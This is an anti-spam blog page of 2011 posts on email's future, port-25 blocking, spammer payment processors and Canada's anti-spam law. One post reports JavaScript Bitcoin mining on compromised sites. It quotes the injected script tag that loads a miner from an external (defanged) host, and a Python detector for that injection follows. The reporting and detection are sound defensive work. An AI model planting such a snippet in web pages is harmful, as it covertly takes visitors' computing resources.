Anti Spam Blog

Covering spam protection and email technology

News

Is Email Really Dying in the Enterprise?

December 20th, 2011 Posted in News


The Financial Times recently wrote an article titled, “End email: Firms find a cure for inbox hell”, in which they declared — for the thousandth time in mainstream media since 1996 — that email is dying in the enterprise. The reasons cited for the death of email include privacy and productivity. Apparently, social networking technologies such as Yammer are going to replace email with something more productive; and paper notes will serve to make communications private once again.

Here’s the problem with this reasoning. “Email” in the context of Internet electronic mail is simply a collection of protocols for exchanging messages between parties over the Internet. Yammer and other systems serve the same function, except using different, less open (and often completely closed) protocols. Yammer is essentially the same as email, but implemented within a closed network, where greater control can be effected on the participants. But if you need to get a message to someone who isn’t participating in your private network – be it Facebook, Yammer, Twitter, or some other new system – email will always be the fallback.

My position is that email is a great platform on top of which rich collaboration tools can be built. For instance, Xobni implements an enterprise layer on top of email that pulls together all the information that might be relevant to whatever conversation you’re viewing in your mail client (Outlook, Gmail, etc.). With Xobni, you get to keep the universal acceptability and interoperability of email, while benefiting from integration with other data sources.

Systems like Yammer will have their place, but email is not going away any time soon. It will just get better.

Bitcoin Mining Coming to a Compromised Web Site Near You

December 12th, 2011 Posted in News, botnets

A poster to the Full Disclosure mailing list announced today that he had discovered JavaScript-based Bitcoin mining software on a compromised web site. Here’s the original post for reference:

Group,
Recently I ran across the below on a site:

<script type="text/javascript" src="hxxp://www.bitcoinplus.com/js/miner.js">
</script>
<script type="text/javascript">// <![CDATA[
  BitcoinPlusMiner(10215318);
// ]]></script>

I know the 10215318 represents the bitcoin email, but I was curious if
there was a way to figure out what the email actually was instead of the
number above.  Would be nice to find out what email address may have been
involved in  compromising the site.  Thanks for any help you may be able
to provide.

James

For those who are not in the know about Bitcoin, it suffices to say that Bitcoin provides a way of turning CPU cycles into cash. We’ve known for a while that botnet operators have been deploying Bitcoin mining programs onto compromised PCs. The difference with what’s been discussed today is that the mining happens not through a botnet installation, but rather simply by visiting the web site and running its JavaScript code in your browser (something that is automatic).

For a cybercriminal, the idea of deploying a bit of JavaScript onto a compromised web site and then monetizing millions of spare cycles of CPU time from web site visitors must evoke something close to a religious experience. Is it time for our web browsers to police JavaScript CPU consumption more aggressively?
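
A site owner can check pages for the injection quoted above mechanically. The following Python is an added example, not code from the original post or from Bitcoin Plus: it flags external script hosts outside an allowlist and inline calls to `BitcoinPlusMiner(...)`. The allowlisted hosts and the sample page are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts this site legitimately loads scripts from (hypothetical).
ALLOWED_SCRIPT_HOSTS = {"www.example.com", "cdn.example.com"}
# Entry point seen in the quoted post; its argument is the account number.
MINER_CALL = re.compile(r"BitcoinPlusMiner\(\s*(\d+)\s*\)")
# Constructed sample page embedding the snippet from the post (still defanged).
SAMPLE_PAGE = """<html><head>
<script src="/js/site.js"></script>
<script type="text/javascript" src="hxxp://www.bitcoinplus.com/js/miner.js">
</script>
<script type="text/javascript">// <![CDATA[
  BitcoinPlusMiner(10215318);
// ]]></script>
</head><body>Hello</body></html>"""

class ScriptAudit(HTMLParser):
    """Record unexpected external script hosts and inline miner calls."""
    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self._in_script = True
        src = dict(attrs).get("src")
        if src:
            # Accept defanged "hxxp" so snippets pasted from reports parse too.
            host = urlparse(re.sub(r"^hxxp", "http", src, flags=re.I)).hostname
            if host and host not in ALLOWED_SCRIPT_HOSTS:
                self.findings.append(("unexpected-script-host", host))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:  # only inline script bodies, not visible page text
            self.findings += [("miner-call", m) for m in MINER_CALL.findall(data)]

def audit_page(html):
    parser = ScriptAudit()
    parser.feed(html)
    parser.close()
    return parser.findings
```

Run over every served page, `audit_page` returns an empty list for clean pages. Relative script paths are ignored because they resolve to the site's own host.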

South Korea to Block Port 25

November 16th, 2011 Posted in News, botnets, outbound spam


Last week, according to the BBC, South Korea’s Internet and Security Agency began encouraging ISPs to block port 25 to limit the quantity of botnet spam emanating from the country. South Korea has long had a reputation as a haven for botnet spam, most likely because of the large number of Internet users in the country, and the extremely high quality and low cost of their broadband access. The recommendation to block port 25 will probably improve things in South Korea, if the ISPs get around to implementing this change. I’m not sure how influential the regulator is in that country, but if it’s like other developed countries, the ISPs are likely to drag their feet to avoid affecting users negatively.

Spamhaus thinks governments should cut off funds to spammers

November 2nd, 2011 Posted in News

In a November 1st post entitled, “Who’s Really Paying Cybercriminals?” influential blocklist provider Spamhaus suggests that it’s perhaps time that governments started using their financial leverage to choke off funding to spammers, in the same way that they have choked off funding to groups like Wikileaks. This is an interesting idea, because recent research has suggested that the vast majority of spam revenue flows through a relatively small set of payment processors (see Show Me the Money: Characterizing Spam-advertised Revenue [PDF]). If governments were to shut down just a small number of payment processors, spammers would find their business suddenly a great deal less profitable.

What happens after these sources of funds are cut off is anyone’s guess; however, I wouldn’t rule out a move toward pseudonymous payment systems like Bitcoin, or the use of other creative techniques to get around the issue of government control. Wikileaks was particularly vulnerable to having its funds choked off because it was easy for Visa and Mastercard to identify transactions headed their way. It’s perhaps a little more difficult to recognize spam-related transactions, because the recipient’s merchant account can switch frequently from one entity to another, and because the patterns of transactions look a great deal like legitimate e-commerce.

Lobbyists put Canada’s new anti-spam law at risk

November 1st, 2011 Posted in News

Earlier this year, the anti-spam community thought it had scored a major win by enacting the toughest anti-spam laws in the world, right here in Canada. Then today, Michael Geist, a law professor and copyright expert at the University of Ottawa, writes that, “it is déjà vu all over again as the government works to finalize the regulations for the anti-spam legislation and the same groups make many of the same arguments.” Apparently, the Canadian anti-spam law is too tough on marketers, or so they would like us to believe. Fortunately, the law has been passed – it attained “royal assent” in December 2010. What’s being held up are the regulations – the finer points that set out the precise meanings of things in the Act itself.

Canada’s new anti-spam law, titled the Fighting Internet and Wireless Spam Act, sets out some tough requirements on marketers, which are designed to prevent them from sending us email we don’t really want. Unlike the American CAN-SPAM act passed several years ago, the Canadian law requires marketers to obtain your consent before sending you email. But it’s the penalties that really differentiate the Canadian act from its American cousin. Marketers can be sued for violations of the Act even if the email they are sending is originating from another country. This empowers Canadians to sue firms in the US and elsewhere, even though the anti-spam laws in those countries may not be as strict.

Here’s the section that makes me the most excited:

48. (1) A person who alleges that they are affected by an act or omission that constitutes a contravention of any of sections 7 to 10 of this Act or of section 5 of the Personal Information Protection and Electronic Documents Act that relates to a collection or use described in subsection 7.1(2) or (3) of that Act — or that constitutes conduct that is reviewable under section 74.011 of the Competition Act — may apply to a court of competent jurisdiction for an order under section 52 against one or more persons who they allege have committed the act or omission or who they allege are liable for the contravention or reviewable conduct by reason of section 53 or 54.

I know of at least one email technology expert in Canada who is looking forward to setting up a partnership with a litigation practice, specifically to go after American marketers who fall afoul of the new Canadian anti-spam law. I suppose he’ll have to wait a little longer now.